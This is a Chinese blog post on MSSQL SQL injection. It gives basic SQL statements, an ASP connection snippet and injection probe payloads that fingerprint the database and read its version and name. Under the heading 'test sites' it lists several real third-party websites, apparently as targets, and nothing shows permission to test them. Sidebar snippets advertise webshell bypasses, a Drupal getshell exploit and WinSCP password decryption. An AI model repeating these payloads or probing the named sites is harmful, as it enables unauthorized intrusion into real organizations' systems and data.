web安全-理论+实战SQL注入漏洞

最新推荐文章于 2024-04-10 23:46:04 发布
最新推荐文章于 2024-04-10 23:46:04 发布
阅读量574 收藏 8
点赞数 1
分类专栏: web安全 实战篇 文章标签: web 安全 理论 实战SQL 注入漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kclax/article/details/90722741
版权

理论+实战SQL注入漏洞

在这里插入图片描述
在这里插入图片描述

(1433是Mssql端口)

基本语句:

  • Select*from 表名 查询表内所有内容
  • CREATE DATABASE database-name 创建数据库
  • drop database dbname 删除数据库

调用代码

<%

set conn =server.createobject(” adodb.connection”)

conn.open  “provider= sqloledb;source= local;uid= sa;pwd = ****database= database-name”

%>

其中,provider后面的不用管,照写; source后面的可以是ip地址,这里我用的是本地的; sa是内置的用户,它的密码是你在安装的时候设置的;database后面是你要连接的数据库的名称,例:mydatabase(不需扩展名)。

注入语句

  • 判断是否有注入(and 1=1 ;and 1=2)
  • 初步判断是否是mssql(and user>0)
  • 判断数据库系统and(select cout(*)from sysobjects)> 0 mssql
  • 数据库版本 id=1 and 1(select@@version)
  • 当前使用的数据库 id=1 and 1=(select db_name())

测试站点

http://jsjx.hnjdzy.net/ https://www.szclou.com/ http://www.hnagri.com/index.html http://www.wh3z.cn/ http://www.jingluoyangsheng.cn/ http://www.southsurvey.com/ mysql4.0数据库 http://www.cowinbio.com/cw/index.php

Coisini、
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web安全-dvwa实战
07-05
SQL回显注入:说明SQL回显注入是一种允许攻击者执行恶意SQL查询的漏洞。探讨如何利用该漏洞来访问、修改或删除敏感数据。 6。XSS(跨站脚本攻击):描述XSS攻击是如何通过在Web应用程 7.命令注入:描述通过用户输入...
Web安全——SQL注入漏洞
最新发布
2402_83242246的博客
04-23 624
web页面源代码对用户提交的参数没有做出任何过滤限制,直接扔到SQL语句中去执行,导致特殊字符改变了SQL语句原来的功能和逻辑。黑客利用此漏洞执行恶意的SQL语句,如查询数据、下载数据,写webshell、执行系统命令以此来绕过登录权限限制等。本质就是混淆数据和执行代码,使输入的数据变成可执行的语句。
sql注入漏洞简单讲解与实战
Lenovoliao的博客
04-10 1865
SQL注入SQL Injection)是一种常见的网络安全漏洞,攻击者利用该漏洞向应用程序的数据库发送恶意的SQL查询,从而绕过身份验证、获取敏感数据或者对数据库进行修改。SQL注入通常发生在与数据库交互的Web应用程序中,尤其是那些直接将用户输入拼接到SQL查询语句中的应用程序。攻击者利用SQL注入漏洞时,常常通过在输入字段中插入SQL代码来干扰、扩展或篡改原始SQL查询的执行。这种攻击可以使攻击者获得未经授权的数据访问权限,例如用户凭证、个人信息或者敏感业务数据。
墨者学院-X-Forwarded-For注入漏洞实战
weixin_42939822的博客
03-27 6255
墨者学院-X-Forwarded-For注入漏洞实战
sql注入详解
热门推荐
yy
05-05 19万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
WEB-漏洞总结(sql注入详解)
qq_50643984的博客
03-24 1万+
SQL注入 sql注入分类 1.post注入,get注入,cookie注入,http头注入(可能user-agent存在注入) 2.数字型注入,字符型注入(类似一个int,一个chr) 3.盲注:布尔盲注,时间盲注 报错注入:利用报错函数,常见报错函数 ...
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
Web安全测试中常见逻辑漏洞解析(实战篇)
01-29
相比SQL注入、XSS漏洞等传统安全漏洞,现在的攻击者更倾向于利用业务逻辑层的应用安全问题,这类问题往往危害巨大,可能造成了企业的资产损失和名誉受损,并且传统的安全防御设备和措施收效甚微。今天漏洞盒子安全...
web安全-小迪渗透完整视频教程附资料和工具
06-12
内容概要:通过视频带动学者实际做各种安全分析及其实战。你会了解漏洞的形成原因,为什么会出现漏洞,那么又该如何利用漏洞 适合人群:适用web安全初学者 ...认识加密算法编码 3.sql注入 保护网络,人人有则
万能密码漏洞
Coisini的博客
06-15 1万+
本来都不打算讲这个漏洞的(感觉太low了),但是在最近的一次渗透测试中,居然发现了这个漏洞,而且还是政府的网站……所以还是打算讲一下吧 最近在一次爬网站地址时,发现了这个登录界面,随手输入了一个万能密码,没想到居然进去了 漏洞原理: 网站把密码放到数据库中,在登陆验证中一般都用以下sql查询语句去查找数据库 sql=select * from user where username=’use...
web安全-上传漏洞-Ewebeditor编辑器漏洞利用
Coisini的博客
05-31 7911
Ewebeditor简介 漏洞利用 ***默认路径就不一定了,有可能是“edit/admin_login.asp”或者“admin/edit/admin_login.asp”。(默认密码后台:admin,admin) 如果eWebEditor的后台用户名和密码都已经被修改了,那么我们还可以通过下载数据库来获得管理员用户名和密码,数据库默认的下载路径为“/db/ewebeditor.mdb”。下载...
web安全-使用burp suite进行表单暴力破解(含验证码)
Coisini的博客
05-30 5300
实训目标 1、了解验证码的工作原理; 2、掌握burp suite使用方法; 3、了解弱密码的攻击方式; 4、了解弱密码的危害。 一.题目提示: 后台管理员用户密码为弱密码(3位数字) 管理员账号为:admin 登录界面为: 拿到这道题首先要了解验证码的工作原理 二.打开burp suite进行抓包 至于还不会使用burp suite的同学亲自行百度(http...
谈谈Json格式下的CSRF攻击
Coisini的博客
06-27 4417
一、CSRF漏洞简介 csrf漏洞的成因就是网站的cookie在浏览器中不会过期,只要不关闭浏览器或者退出登录,那以后只要是访问这个网站,都会默认你已经登录的状态。而在这个期间,攻击者发送了构造好的csrf脚本或包含csrf脚本的链接,可能会执行一些用户不想做的功能(比如是添加账号等)。这个操作不是用户真正想要执行的。 在post标准化格式(accounts=test&password...
[投稿]Webshell下命令执行限制及绕过方法
Coisini的博客
06-23 4030
0x00 前言 上传webshell后,执行命令时或许没法执行了,这时我们该分析下原理并想出绕过方式,防守方也必须根据绕过方式想想更强的防御. 0x01 php webshell执行命令原理 php webshell(以下简称webshell)下是怎么执行系统命令的?我们找一个webshell分析下 搜索关键字定位到以下代码 function execute($cfe) { $re...
web常用绕过 00截(常用 00截断 攻击chr(0)字符)
Coisini的博客
06-06 3940
首先先来看一个简单的asp实例 <% username = request("username") Response.write username %> 这段代码从URL处获得参数username的值,然后显示在页面中。 可见%00之后的内容没有保存到变量中。 <html> <head> <meta http-equiv="Content-Lan...
Drupal 7.31SQL注入getshell漏洞利用详解及EXP
Coisini的博客
06-15 3900
0x00 这个漏洞威力确实很大,而且Drupal用的也比较多,使用Fuzzing跑字典应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp不再深入下去。 0x01 关于漏洞的原理和POC在我的博客上已经有文章进行解释,这里只是着重说一下利用过程。配合POC的效果,我主要是从远程代码执行和GetShell方面去做的利用。 远程代码执行利用: 1.使用超级管理...
Web攻击检测机器学习深度实践
Coisini的博客
06-25 3527
一、概述 1.1 传统WAF的痛点 传统的WAF,依赖规则和黑白名单的方式来进行Web攻击检测。该方式过分依赖安全人员的知识广度,针对未知攻击类型无可奈何;另一方面即使是已知的攻击类型,由于正则表达式天生的局限性,以及shell、php等语言极其灵活的语法,理论上就是可以绕过,因此误拦和漏拦是天生存在的;而提高正则准确性的代价就是添加更多精细化正则,由此陷入一个永无止境打补丁的漩涡,拖累了整体性能...
关于Winscp 密码获取解密
Coisini的博客
06-15 2972
WINSCP默认保存用户密码在注册表中的如下位置 HKEY_USERS\SID\Software\Martin Prikryl\WinSCP 2\Sessions\ 但是WIN7\8下WinSCP默认路径在: C:\Users\USERNAME\AppData\Local\VirtualStore\Program Files (x86)\WinSCP\WinSCP.ini (64位操作系统) ...
web漏洞解析与攻防实战电子版
07-16
《Web漏洞解析与攻防实战》是一本介绍Web安全的书籍,通过深入分析和解读常见的Web漏洞,帮助读者更好地理解和防范Web应用程序的攻击。 在该书的电子版中,作者首先介绍了Web应用程序的基本原理和相关技术,包括...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值